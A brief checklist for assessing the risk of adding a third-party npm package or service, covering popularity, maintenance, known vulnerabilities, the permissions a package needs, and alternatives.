Third-Party SDK Risk Assessment

Format: Before adding a new npm package or third-party service, conduct a risk assessment.

Assessment checklist:

Package name: _____

Basic information:
- [ ] Weekly downloads? (>100K is generally safe)
- [ ] Last updated? (>1 year without updates is risky)
- [ ] GitHub stars? (Reference, but not the only criterion)
- [ ] Number of maintainers? (Only 1 maintainer has bus factor risk)
- [ ] Any known security vulnerabilities? (Check with npm audit)

Permissions:
- [ ] Does it need network access?
- [ ] Does it need to read/write the filesystem?
- [ ] Does it need environment variables?
- [ ] Does it send data to external servers?

Alternatives:
- [ ] Are there more popular alternatives?
- [ ] Can you skip this package and write a simple version yourself?